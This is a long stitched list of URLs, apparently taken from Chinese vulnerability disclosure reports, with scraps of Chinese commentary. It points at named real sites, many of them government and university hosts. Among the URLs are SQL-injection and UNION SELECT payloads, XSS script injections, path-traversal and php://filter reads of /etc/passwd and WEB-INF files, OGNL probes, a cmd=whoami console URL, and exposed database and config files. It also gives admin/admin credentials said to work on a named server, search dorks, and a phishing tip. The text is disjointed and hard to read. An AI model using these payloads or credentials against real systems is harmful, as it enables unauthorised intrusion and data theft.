http://www.pdstyyp.com/Article.Asp?id=547 http://zgyuanfeng.com/Article.Asp?id=6594 http://hbgjdx.com/Article.Asp?id=6548 http://www.pdszygz.com/article.asp?id=1274 http://fx-jc.com/Article.Asp?id=347 http://www.pdsxj.com/article.asp?id=7433 http://brtjckj.pdswzjs.com/Article.Asp?id=146 http://www.hnzxzj.com/article.asp?id=6613 http://pdsyhy.com/Article.Asp?id=123 http://www.hnzpzb.com/article.asp?id=2045 http://www.hnsyyy.net/Article.Asp?id=6790 http://www.yuesun.com.cn/Article.Asp?id=172 http://www.xiaolufushi.com/Article.Asp?id=6679 http://www.huashunsy.com/Article.Asp?id=6492 http://juyuankangye.com/Article.Asp?id=129 http://pdsycy.com/article.asp?id=744 http://yb0953.com/article.asp?id=6522 http://www.zykjgl.com/Article.Asp?id=6717 http://www.hoboc.net/Article.Asp?id=6589 http://pdsgz.com.cn/weuzhangArticle.Asp?id=6607 http://www.shenzhenshuikong.com/article.asp?id=559 http://www.pdshkdc.com/Article.Asp?id=6616 http://www.pdsqysy.com/Article.Asp?id=143 http://hnadsc.com/article.asp?id=466 http://agent.ikang.com/index.php?Action=DoLogin&Module= http://agent.ikang.com/info.php http://ecard.sdut.edu.cn/Index_ShowNews.aspx?NewsCode=269 http://www.zparkhr.com.cn/data/ http://www.ccbooknet.com http://124.133.54.4:8080/ http://mail.xhby.net/admin/ http://www.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1 http://zx.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1342 http://xc.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1460 http://lgb.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1619 http://xcb.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1619 http://kexie.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=951 http://english.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=1633 http://phcoop.pinghu.gov.cn/ucms/cms/webapp/column.jsp?ColumnID=268 http://a.ikangdental.com/ http://a.ikangdental.com/Account/ http://a.ikangdental.com/GGXX/ http://a.ikangdental.com/GGXX/List.aspx?id= http://a.ikangdental.com/GGXX/List.aspx?id=12%20AND%203*2*1%3d6 http://a.ikangdental.com/GGXX/List.aspx?id=12%20AND%203*2*1%3d2 http://stuhome.ustc.edu.cn/存在SQL注入漏洞,通过注入可以获取网站架构信息、数据库信息、账户密码信息等。网站注入点为 http://stuhome.ustc.edu.cn/list.php?cid=5 http://tprc.org.cn http://oa.zikeys.com/ http://zikeys.cn http://zdyn.com.cn http://www.argers.com http://nea.org.cn http://sprove.com http://www.ld-home.com/ http://jwc.bfa.edu.cn/default5.aspx inurl:article.php?MsgId= http://www.hxjjjc.gov.cn/article.php?MsgId=70313 http://www.ahjjjc.gov.cn/article.php?MsgId=84729 http://www.whjjw.gov.cn/article.php?MsgId=92248 http://www.hnsjw.cn/article.php?MsgId=94493 http://www.szsjw.gov.cn/article.php?MsgId=94028 http://www.dsjjjc.gov.cn/article.php?MsgId=80542 http://www.aqtcjjjc.gov.cn/article.php?MsgId=92276 http://m.xflz.gov.cn/list.asp?type=2&c=20107895055150 http://m.wznlw.gov.cn/list.asp?type=2&c=20107895055150 http://m.ypbxygw.gov.cn/list.asp?type=2&c=20107895055150 http://m.wtlz.gov.cn/list.asp?type=2&c=20107895055150 http://m.dxyglz.gov.cn/list.asp?type=2&c=20111588089187 http://mkl.xznlw.gov.cn/list.asp?type=2&c=20107895055150 http://mpg.xznlw.gov.cn/list.asp?type=2&c=20144636617408 http://mbd.xznlw.gov.cn/list.asp?type=2&c=20107895055150 http://www.xupudj.net/list.asp?type=%C8%CB%CA%C2%D6%C6%B6%C8&id=61 http://m.nwygnlw.gov.cn/list.asp?type=2&c=20107895055150 http://www.hs1861.com/info/list.asp?news_id=1301 file:///etc/passwd http://www.ctaxnews.com.cn/zt/template/list/nt_list.jsp?ID=37&ZTID=12 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.edutt.com/2012key/key_show.asp?id=2356 http://www.cxyd188.com/login.php inurl:space_inc/tp.jsp?infoId= http://www.hshsh.pudong-edu.sh.cn/bl/space_inc/tp.jsp?infoId=info150000 http://www.sqlmap.org www.hshsh.pudong-edu.sh.cn\session http://tc.xmjs.gov.cn http://tc.xmjs.gov.cn/Parking/Regist_cmpservice.aspx http://tc.xmjs.gov.cn/Parking/Cmp_info.aspx inurl:/index.asp?newsid= inurl:/index.asp http://www.jhlawfirm.cn/jhlaw2/intro/index.asp?newsid=1 http://www.jhlawfirm.cn/jhlaw2/lawyers/index.asp?categoryid=19 http://www.jhlawfirm.cn/jhlaw2/case/index.asp?typeid=1 http://www.ccbrr.com/yklaw/yuandi/index.asp?categoryid=73 http://www.sqlmap.org www.ccbrr.com\session http://ime.files2.sogou.com/sogou_pinyin_7.2.0.2935_chup.exe http://ime.files2.sogou.com/sogou_pinyin_7.2.0.2935_chup.exe http://www.iebcc.com/ http://123.103.21.91/ http://vote.pigai.org/Home/index.php?s=/Qa/index/id/34 http://dwz.cn/lhNra http://wd.koudai.com/vshop/1/H5/kd.html?s=bsmym9GnsN5NhBlDLFkQTg%3D%3D http://www.guifeng.net/index.html http://topic.it168.com/game/snapdragon1211/getdata.ashx?jsoncallback=?&articleTypeId=1 http://xianguo.com/my/opml http://1v4n.sinaapp.com http://1v4n.sinaapp.com/xxxxxxx php://filter/read=convert.base64-encode/resource=file:///etc/passwd http://1v4n.sinaapp.com/xxe/evil_php.xml http://de.appchina.com http://de.appchina.com/feed/ http://www.ellechina.com/?s_cid=xianguolife http://www.ellechina.com/xml/rss/xianguo_life_rss.xml http://yidacms.com http://www.sooka.com.cn/ http://www.shuangyang.gov.cn/ http://www.shuangyang.gov.cn/search.jsp?key=a'&type=1&x=7&y=4 http://www.lnsds.gov.cn/jis/objectbox/selx_userlist.jsp?fn_Keywords=1 http://www.lnsds.gov.cn/jis/objectbox/selx_userlist.jsp?fn_Keywords=1 http://www.pigai.org/index.php?c=teacher&a=requestviewall&sts=2&id=5 http://www.pigai.org/index.php?c=teacher&a=requestviewall&sts=2&id=5 url:http://202.108.90.135:80/manager/html user:admin pass:admin http://202.108.90.135/gsApp/ user:admin pass:admin https://zk.szsi.gov.cn/jrsbksb/dwlogin.action https://zk.szsi.gov.cn/jrsbksb/dwlogin.action jar:/bea/user_projects/domains/JRSBKSB_9002/lib/util400.jar:/bea/user_projects/domains/JRSBKSB_9002/lib/antlr-2.7.6.jar:/bea/user_projects/domains/JRSBKSB_9002/lib/commons-lang-2.3.jar:/bea/patch_wls1035/profiles/default/sys_manifest_classpath/weblogic_patch.jar:/bea/jdk160_24/lib/tools.jar:/bea/wlserver_10.3/server/lib/weblogic_sp.jar:/bea/wlserver_10.3/server/lib/weblogic.jar:/bea/modules/features/weblogic.server.modules_10.3.5.0.jar:/bea/wlserver_10.3/server/lib/webservices.jar:/bea/modules/org.apache.ant_1.7.1/lib/ant-all.jar:/bea/modules/net.sf.antcontrib_1.1.0.0_1-0b2/lib/ant-contrib.jar:/bea/wlserver_10.3/common/derby/lib/derbyclient.jar:/bea/wlserver_10.3/server/lib/xqrl.jar http://ah.189.cn/service/pay/newpayment.action http://ah.189.cn/service/pay/findByUser.action?userInfo.loginType=4&userInfo.serviceNbr=18055811112&flag=0&chargeType=1&key=a410f09e94b09772b6339561443dbf70 http://ah.189.cn/jsp/payment/newbankcard/js/newpayment.js http://home.aipai.com/28857310?action=updateInfo&sub=password inurl:index.php?g=Home&m=Index&a=help inurl:login http://www.fifee.com/ http://222.85.126.230:8080/ekbs/ask/userCenterAction.action?method=getTop100Account http://wooyun.org/bugs/wooyun-2010-040424和http://wooyun.org/bugs/wooyun-2010-026176 http://edm.wowsai.com/ http://edm.wowsai.com/.svn/entries http://zq.e23.cn/bbs/viewthread.php?tid=118916&page=1&extra=#pid217929 http://zq.e23.cn/bbs/index.php http://sgsj.gov.vn http://urp.hebau.edu.cn https://github.com/knownsec/KCon/blob/master/KCon%20V3/%E5%8E%BB%E5%B9%B4%E8%B7%A8%E8%BF%87%E7%9A%84%E5%AE%A2%E6%88%B7%E7%AB%AF.pptx http://wooyun.org/bugs/wooyun-2010-068198 https://dx.9555168.com/iphone/index.html http://dx.9555168.com/page.php?id=16 http://search.js.cei.gov.cn/test.php http://search.js.cei.gov.cn http://search.js.cei.gov.cn/subeifz222/phpinfo.php http://search.js.cei.gov.cn/002_jszh/dbconfig/dbconf.inc http://search.js.cei.gov.cn/007_hd56info/admin/ http://search.js.cei.gov.cn/007_hd56info/_sql/hd56info.sql http://search.js.cei.gov.cn/007_hd56info/dbconfig/ http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.shunhengli.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://oa.chnjcdc.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://115.29.234.197:8090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://119.145.194.122:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1 http://lqcc.ustc.edu.cn/news/?column=19 http://lqcc.ustc.edu.cn/news/?column=19 http://www.lianchuang.com/ http://221.13.223.132:8086/verifycode/verifycode_create.action http://office.lianchuang.com/basic/user/validNumGenerate.action http://www.aastar.com.cn/login!validNumGenerate.action http://202.102.108.199/verifycode/verifycode_create.action http://202.102.41.105:8080/verifycode/verifycode_create.action http://202.102.108.199/systemportal/index.jsp http://www.iqiyi.com/u/api/relation/follow?uids=2214309904&agent_type=202&followfrm=1_0_0_0&antiCsrf=87541a9210aacd620d691b76315f0704&callback=window.Q.__callbacks__.cbvars5v http://www.iqiyi.com/u/api/relation/follow?uids=2214309904 http://erp.ikang.com/ http://59.151.25.182/ http://zsk.ikang.com/ ikang.com/123456(其实很多时候并不是没有弱口令,而是用户名不对,有了用户名大大提高了成功率) http://59.151.28.10:8100 http://59.151.28.10:8100/manager/html发现存在,测试口令admin/admin成功登录 http://profile.pengyou.com/index.php?mod=profile&u=c265e4bd629300c51fa30354d885dfcb506009baa0945719&ADTAG=TUIJIAN_HEAD&_end tel:10086 http://www.zhujiwu.com/domain/ www.pook.com http://www.taojiang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=aaa http://www.taojiang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=aaa http://www.taojiang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a http://www.czjj.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a http://www.taojiang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a http://www.wugang.gov.cn/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a http://www.sheshantravel.com/jcms/short_message/opr_domsg.jsp?fn=DA&i_id=1&vc_name=a http://61.191.41.208:9080/ http://www.dianping.com/shop/515381 www.183.gd.cn http://www.183.gd.cn http://219.159.76.60:9080/agent/ http://219.159.76.60:9080//info/maintain/frame.jsp?dsName=whinfo_ds&cityName=%CE%DF%BA%FE http://www.net137.cn/ http://www.jsytchem.com/yanjiu/sub_news.asp?id=153 http://www.jiehechina.com/newshow1.asp?id=66 http://www.daban-japan.cn/newshow1.asp?id=40 http://www.lhzyhj.com/newshow1.asp?id=113 http://www.sdydgc.cn/temp.asp?id=31 http://www.sapphireed.com/cooshow.asp?id=438 http://www.yxgedeng.com/pro_show.asp?id=131 http://tjhonglin.com/pro_show.asp?id=142 http://www.hongyouhg.com/pro_show.asp?id=317 http://www.czdsgl.com/pro_show.asp?id=100 http://www.zhongxinjingji.com/newshow1.asp?id=200 http://www.czjodt.com/pro_show.asp?id=146 http://www.hrnd.cn/sub_news1.asp?id=134 http://www.czwzy.com/pro_show.asp?id=188 http://www.yihuaoffice.com/news_veiw.aspx?tb=h&id=3 http://www.liliping.com/sub_news.asp?id=108 http://yangbo.cn/ItemView.aspx?id=14 http://www.szsdzsg.com/pro_show.asp?id=710 http://www.sunputech.com/sub_news.asp?id=173&lx=1 http://czpuhe.com/sub_news.asp?id=182&lx=1 http://www.czjyyfs.com/pro_show.asp?id=833 http://www.bxwl.com.cn/news.asp?id=154&show=yes http://www.cztengtuo.com/pro_show.asp?id=200 http://www.czdingwang.cn/pro_show.asp?id=16&title=%F6%F9%D3%E3%BC%D0 http://www.jwxxedu.com/newsXI.aspx?id=1339 http://www.lyhxbx.com/sub_news.asp?id=280&lx=2 http://www.zgxysj.cn/web_html_list_show.asp?id=2375&cid=5 http://www.jmzhongye.com/ http://xzm.ikang.com/news_article.php?id=1 http://cdhzb.ikang.com/news_article.php?id=1 http://youth.whut.edu.cn/newcity/manage/login.aspx http://www.hxdi.com/ http://www.hxdi.com/phpmyadmin/ http://www.datangmobile.cn/ http://219.142.67.31/Search.aspx?KeyWords=12 http://***.qzone.qq.com http://www.huakaishi.com/index.action http://58.59.39.44:8888/site/Public/ShowInfo.aspx?id=180 http://123.233.247.157:90/site/Public/ShowInfo.aspx?id=716144 http://www.shanxiga.gov.cn http://www.ycgabmfw.gov.cn http://www.dtgabmfw.gov.cn http://58.59.39.44:8888/site/Public/ShowInfo.aspx?id=180 http://123.233.247.157:90/site/Public/ShowInfo.aspx?id=716144 http://www.bzga.gov.cn/site/Public/ShowInfo.aspx?i http://www.tbqjx.com/hzgg.php http://www.zjptcc.com/ http://www.zjptcc.com/customer.asp?type=article&id=C0001 http://60.170.103.21:81/ http://221.1.218.166:81/ http://www.zixilib.com:8008/ http://ggg.360elib.com/ http://www.tsqtsg.cn:88/ http://60.222.239.237:81/ http://dydl.dylib.gov.cn/ http://zslib.org:8000/ http://120.194.7.10:8087/ http://114.104.156.250/ http://book.gyxtsg.org/ http://60.170.103.21:81/BookDetail.aspx?id=23045 http://60.170.103.21:81/VideoDetail.aspx?id=17367 http://221.1.218.166:81/BookDetail.aspx?id=147995 http://www.zixilib.com:8008/BookDetail.aspx?id=58260 http://www.zixilib.com:8008/VideoDetail.aspx?id=16 http://www.zixilib.com:8008/Bidu_Books.aspx?id=xx http://www.zixilib.com:8008/BookDetail.aspx?id=58260 http://www.zixilib.com:8008/VideoDetail.aspx?id=42 http://www.zixilib.com:8008/Download.aspx?id=22026 inurl:info_show.asp?num= http://www.hzxhgb.com/info_show.asp?num=239 http://www.yxgtj.net/info_show.asp?num=294 http://www.xxgtj.com/info_show.asp?num=508 http://www.yxgtj.net/info_show.asp?num=359 http://www.hzkfqedu.com/info_show.asp?num=566 http://www.mxwhc.com/info_show.asp?num=37 http://www.sxgdpm.com/info_show.asp?num=31 http://www.dhtyhotel.com/info_show.asp?num=254 http://www.hzdzdd.cn/info_show.asp?num=567 http://www.htqzgh.com/info_show.asp?num=525 http://cqhnb.ikang.com/news_article.php?id=1 http://hnchangning.gov.cn/build/rkj/index.html http://www.newsanli.com/ http://www.hnyyxs.com/ http://www.cs6zhong.com/index.html http://hnchangning.gov.cn/build/kxjs/index.html http://www.cscxcw.com/ http://www.hnlsdz.com/list.aspx?colid=1 http://www.wztrq.com/yyt.aspx http://221.204.238.109:7001/enpadmin/login.action?redirect:${2*2 http://60.13.0.172:7001/enpadmin/login.action?redirect:${2*2 http://fagao.cdpf.org.cn/enpadmin/login.action?redirect:${2*2 http://122.224.215.7:7001/enpadmin/login.action?redirect:${2*2 http://122.225.48.18:7001/enpadmin/login.action?redirect:${2*2 http://sax.sina.com.cn/mfp/click?type=3&t=MjAxNC0wOC0yOCAxMDozNjozOQkyMjIuNDEuMTcwLjY2CV9fMjIyLjQxLjE3MC42Nl8xNDA5MTkzMzE4XzAuMTg5OTQxMDAJaHR0cDovL25ld3Muc2luYS5jbj9zYT10MTI0ZDEyNjY0NTA3djcxJmRvbWFpbj12aWRlby5zaW5hLmNvbS5jbiZ3bT00MDA3JnZ0PTQJUERQUzAwMDAwMDAyMTA3MglmNjUzNTQzMC1hZGQyLTRhNTYtYTEwYy0zZTc1NjQ5NjQ3YzcJMzI3ODZFQ0JBQjc0CTMyNzg2RUNCQUI3NAktCS0JMzIzMDAwfDMyMzAwMQkzMjc4NkVDQkFCNzQJTkIxNDAzMDUyNQkJMzI3ODZFQ0JBQjc0CVdBUAktCTUzCS0JLQktCS0JLQktCS0JLQk0&url=http%3a%2f%2faris.dbqzj.net%2fis-howell&vt=4&wm=4007 http://sax.sina.com.cn/mfp/click http://xss1test.qzone.qq.com&wm=4007 http://59.151.27.4/ data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVuIik8L3NjcmlwdD4= zb.muc.edu.cn/svlcontent?action=FETCH_CONTENT&content_id=65 http://www.wowsai.com/index.php?app=user&uid=1007913 http://www.seotcs.com/ http://www.seotcs.com/seo/base.action http://www.jsgyrc.gov.cn/main/conn.asp http://www.jsgyrc.gov.cn/rczx/cx.asp http://xiangyouhui.cn/news/linknews/id/251745 http://staticlive.douyutv.com/robots.txt http://staticlive.douyutv.com/index.php inurl:/windsmake/manager_login.asp http://www.btoe.cn/jingdiananli.html http://mec.ikang.com/index1.php?city=0010&Action=Operator&hospid=085 http://mec.ikang.com/index1.php?Action=Operator&city=&hospid=1 http://www.aybm.cn/index_v.aspx页面 http://www.553.com/这个网站接口没有限制,账号体系和主站是同一个 http://www.553.com http://login.gaitu.com http://job.ehuatai.com/hr/cms/web/preview1.jsp?TID=20060521190232014432360 http://ea.ehuatai.com/jsp/actions/htWelcomeAction_chanPin http://shop.ehuatai.com/isale/actions/isaleMemberAction-gotoChange.action http://agt.ehuatai.com/Activation/Introduce.aspx?type=1 http://219.141.242.41/AAQuery/ http://219.141.242.41/nonautoQuery/login.aspx http://agt.ehuatai.com/ http://202.108.103.150/activation/smss.aspx http://service.ehuatai.com/jmx-console/ http://chk.ehuatai.com/htsys/loginAction.do?method=init http://211.151.82.170/m_admin/ http://360.zhiye.com/Portal/Account/Login?returnUrl=http://www.baidu.com http://anxiang.gov.cn/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/ini/merpserver.ini http://www.wugang.gov.cn/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/web.xml http://www.godeyes.cn/ http://news.godeyes.cn/extend/publish/inputer.aspx?inputer=%E4%B8%80%E7%AC%91%E5%A4%A9%E6%B6%AF http://116.11.253.25/portal/ http://international.hfut.edu.cn/content_view.php?ID=861 http://rsc.neuq.edu.cn/show.asp?id=237 www.east-port.cn URL:http://www.east-port.cn/flash_upload.php?modelid=11 http://www.sbl365.com/ http://www.sbl365.com/search/View.aspx?id=544615 http://music.google.cn/search?q=inurl:policylaw/policylaw.do&newwindow=1&filter=0 http://music.google.cn/search?q=inurl:index/index.do%3Fact%3Dindex&newwindow=1&filter=0 http://dldxdt.com http://dlahcw.com http://dlhengying.com/ http://huitongfuzhong.com/ http://www.xinmeisheying.com http://www.dljgrl.com http://www.dlxlgs.com http://www.dljyg.com http://www.dlbaina.com http://www.dlmeiou.com/ http://www.zhonghengxin.com/web/txt.php?id=111 http://www.dlbhsc.com/web/proLook.php?id=81 http://www.dltank.com/web/newsLook.php?id=150 http://xxgk.qingzhou.gov.cn/xxgk/workflow/objectbox/selectx_search.jsp?spell=xxgk http://58.40.126.130/ http://www.baidu.com/#ie=utf-8&f=8&tn=baidu&wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%AE%89%E5%BA%86%E5%A3%B9%E7%82%B9&pn=140&oq=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E5%AE%89%E5%BA%86%E5%A3%B9%E7%82%B9 http://www.wjsj.gov.cn/list/index.php?zlm=700&ty=706 http://www.wjsj.gov.cn/include/web_content.php?id=71757 http://www.wjyt.gov.cn/list/index.php?pid=311 http://www.wjyt.gov.cn/include/web_content.php?id=80802 http://www.wjrsj.gov.cn/list/index.php?zlm=786&ty=793 http://www.wjrsj.gov.cn/list/video.php?zlm=784&ty=3 http://www.wjxcg.cn/include/web_content.php?id=76625 http://www.wjxcg.cn/vote/result_view.php?id=37 http://www.wjxcg.cn/list/index.php?ty=1871 http://www.wjmzj.gov.cn/list/index.php?pid=570 http://www.wjmzj.gov.cn/include/web_content.php?id=75396 http://www.wjmzj.gov.cn/list/index.php?pid=2366&ty=2366 http://www.wjxjt.gov.cn/list/message.php?ty=45 http://www.wjcl.gov.cn/include/web_content.php?id=78246 http://www.wjcl.gov.cn/list/index.php?pid=152 http://www.wjcl.gov.cn/list/picnews.php?pid=154&ty=167 http://www.wjlsj.gov.cn/include/web_content.php?id=80832 http://www.wjlsj.gov.cn/list/index.php?pid=1101 http://www.wjxtjj.gov.cn/include/web_content.php?id=80482 http://www.wjxtjj.gov.cn/list/index.php?zlm=1886& http://www.wjlzw.gov.cn/include/web_content.php?id=2038 http://www.wjlzw.gov.cn/per_build/index.php?zlm=7&ty=27 http://www.wjzbcg.gov.cn/info/?zlm=2075&ty=2083 http://wjga.wangjiang.gov.cn/include/web_content.php?id=80740 http://wjga.wangjiang.gov.cn/list/index.php?zlm=1613 http://wjga.wangjiang.gov.cn/list/inter.php?zlm=517&ty=1642 http://wjbz.wangjiang.gov.cn/include/web_content.php?id=80008 http://wjbz.wangjiang.gov.cn/list/index.php?pid=1221 http://www.sme.gov.cn/web/ylc/index.html http://www.sdaxue.com/report/custom.html http://taobaoseller.ikang.com/buy.php?mobile=13888888888(mobile参数其实是post提交的,其实不影响,放到url中也一样,问题参数在packid) http://i.cnzz.com/main.php?c=findpwd&a=modifypwd&checknum=b98925768cb6bf127846056d86[马赛克]&id=[马赛克]656&tmp=4840268a511ba2e&sendtype=email http://202.121.183.55:8000/SoftWarer/ThirdLevel/index.asp?CODE=cad_2006_ch&SLEVEL=L http://202.121.183.55:8000/SoftWarer/ThirdLevel/index.asp?CODE=cad_2006_ch&SLEVEL=L http://202.195.60.180/SoftWarer/ThirdLevel/index.asp?CODE=cad_2006_ch http://www.51.la/report/3_last.asp?id=14975938 http://www.51.la/report/1_main.asp?id=14925938 URL:http://www.sky.hunan.gov.cn/shownews.asp?id=6196 http://www.wowsai.com/log.txt codehttp://2014.sd.gov.cn/module/classification/dicsearch/depsearch.jsp http://2014.sd.gov.cn/module/classification/dicsearch/govsearch.jsp http://passport.csdn.net/account/login?from=http%3a%2f%2fhero.csdn.net%2fOnlineCompiler%2fIndex%3fID%3d633%26ExamID%3d628%26from%3d4%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://news.csdn.net/article_preview.html?preview=1&reload=1&arcid=2821118%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://passport.csdn.net/account/login?from=http%3A%2F%2Fdownload.csdn.net%2Fmy%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E https://passport.csdn.net/account/fpwd?action=forgotpassword&service=http://www.csdn.net/%20service=http://www.csdn.net/%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://special.csdn.net/bdclive/index.html/2?regionid=1455%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://passport.csdn.net/account/fpwd?action=forgotpassword&from=http%3A%2F%2Fjob.csdn.net%2Fcsdn%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://passport.csdn.net/account/login?from=http%3A%2F%2Fnews.csdn.net%2Farticle%2F2014-08-27%2F2821403-the-top-9-of-ali-bigdata-competition%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.zzyg.lss.gov.cn/glbm/ inurl:ShowGGTZ.asp?GGTZID= http://rkk.cdpf.org.cn/ http://zhang.591hx.com/Test/ShowArticle.aspx?oid=1 http://vip.591hx.com/history/hx_hangyezixunlist.aspx?mydate=06-29 http://game.weibo.com/wlt http://www.yqmz.gov.cn/list.aspx?kindid=505 http://www.yqtz.org/shownews.asp?id=2150 http://www.yqtz.org/news.asp?type=3 http://www.yqwqw.com/news.asp?lm_id=12&btype_id=86 http://www.yqwqw.com/qqdc/index.asp?lm_id=38&btype_id=210 http://www.fdayq.gov.cn/yyzs_show.asp?id=389 http://www.fdayq.gov.cn/gzwj.asp?classid=1 http://www.fdayq.gov.cn/notice_show.asp?id=618 http://www.fdayq.gov.cn/zcfg.asp?classid=1 http://www.fdayq.gov.cn/notice_show1.asp?id=367 http://www.fdayq.gov.cn/gz_show.asp?id=556 http://www.fdayq.gov.cn/yyxzs_show.asp?id=607 http://www.fdayq.gov.cn/fg_show.asp?id=68 http://www.lib.sxu.edu.cn/files.jsp?ID=4 http://health.ciming.com/loginMessage.action http://yjsc.ylsy.edu.cn/news.asp?id=56 http://www.hnjcs.com/ http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17 http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%201=1%20and%20'1'='1 http://bond.money.hexun.com/data/new_income.aspx?bondtype=4&col=8&orderby=asc&selDate=2011-11-17'%20and%201=2%20and%20'1'='1 http://xwb.nuc.edu.cn http://xwb.nuc.edu.cn/ss.asp?nr=hello http://portal.hzbq.gov.cn/web-console/ http://portal.hzbq.gov.cn/console/jsp_info.jsp?cmd=whoami http://portal.hzbq.gov.cn/console/mtc.jsp http://www.bestv.com.cn/index.php?m=content&c=index&a=lists&catid=27&modelid=11&platform=1 http://www.bestv.com.cn/phpsso_server/index.php?m=admin&c=login&a=init&forward= www.yueyang.gov.cn/tp/Manage/DataBase/Db.mdb http://www.xwgk.sdu.edu.cn/show.php?id=100%20and%201=2%20union%20select%201,database%28%29,3,4,5,6,user%28%29,8,9,10,version%28%29,12,13,14,15 http://shxq.cumtb.edu.cn http://mall.nbcb.com.cn/order_users.php?act=info_user&order_id=这里是任意数字 http://weibo.cn/nbcbmall这是他们的官方的微博 http://mall.nbcb.com.cn客服热线:4000096528温馨提示:我们已经支持所有银联卡支付,为您带来更好的线上支付体验! http://202.98.116.80/crmrpt/login.aspx http://xueyuan.weibo.com/teacher/allteacher?page=1&level=&order_field=0&order=desc,if%28%281=1%29,1,%28select%201%20union%20select%202%29%29%20desc http://xueyuan.weibo.com/myschool/index?page=1&order_field=1&order=desc https://ops.tudou.com/wp https://blog.ops.tudou.com/wp/?author=*遍历即可 http://ops.tudou.com/usvn/svn/ http://60.18.131.131//lntu/aao_52/index.jsp?curformat=d&curid=10498&depfid=5986&depfname=教学研究与质量科&fid=10498(fid参数过滤不严) http://www.nt-golf.cn/heart/pic_show1.asp?product_ID=126 http://www.nt-golf.cn/heart/news_show.asp?news_ID=315 http://www.nt-golf.cn/golf/gqnews_show.asp?news_ID=288 http://www.authenticmarine.com/news_show.asp?news_ID=37 http://www.banghaocity.com/pic_show.asp?product_ID=38 http://www.banghaocity.com/hynews_show.asp?news_ID=582 http://www.nthzsyy.com/news_show.asp?news_ID=159 http://www.msmtextile.com/pic_show.asp?product_ID=92 http://www.msmtextile.com/news_show.asp?news_ID=314 http://www.xinglu.net.cn/pic_show.asp?product_ID=20 http://www.xinglu.net.cn/news_show.asp?news_ID=310 http://www.piset.com.cn/new2_show.asp?news_ID=160 http://www.piset.com.cn/Police%20gear1.asp?product_ID=14 http://www.yuputyn.com/news_tynkp.asp?news_ID=417 http://www.yuputyn.com/hynews_show.asp?news_ID=446 http://www.yuputyn.com/news_show.asp?news_ID=443 http://www.njunt.com/news_show.asp?news_ID=376 http://www.njunt.com/ggnews_show.asp?news_ID=364 http://www.xwmy168.com/news_show.asp?news_ID=415 http://www.xwmy168.com/bynews_show.asp?news_ID=411 http://www.xwmy168.com/pic_show.asp?product_ID=38 http://www.xwmy168.com/bynews_show_en.asp?news_ID=411 http://www.zhzzf.gov.cn/mlzh.aspx?p=1 http://www.zhzzf.gov.cn/pazh.aspx?p=1 http://www.sunhel.com/en/product/pic_show.asp?product_ID=152 http://www.sunhel.com/en/news/news_view.asp?news_ID=326 http://www.nthyqh.com/news/yeneizixun_detail.asp?news_ID=155 http://www.nthyqh.com/fengcai/fengcai-detail.asp?product_ID=5 http://www.china-wxoptics.cn/pic_show.asp?product_ID=233 http://www.china-wxoptics.cn/news_show.asp?news_ID=211 http://www.china-wxoptics.cn/news_show_en.asp?news_ID=211 http://www.ntwynf.com/news_show.asp?news_ID=103 http://www.ntwynf.com/product_show.asp?product_ID=486 http://www.ntjcjx.cn/news_show.asp?news_ID=78 http://www.ntjcjx.cn/product_show.asp?product_ID=24 http://www.lxgzc.com/aboutus/product_show.asp?product_ID=558 http://www.lxgzc.com/aboutus/news_show.asp?news_ID=464 http://oukai.njunt.com/news_show.asp?news_ID=275 http://oukai.njunt.com/ggnews_show.asp?news_ID=258 http://oukai.njunt.com/fwnews_show.asp?news_ID=236 http://www.ntexcel.cn/pic_show.asp?product_ID=90 http://www.ntexcel.cn/news_show.asp?news_ID=341 http://www.ntcaige.com/pic_show.asp?product_ID=90 http://www.ntcaige.com/news_show.asp?news_ID=362 http://xss.re/api-5946.jpg基础认准钓鱼,在背景图片上传那里,上次以后burp拦截保存的数据包,修改图片地址就OK了 http://open.tuniu.com/ 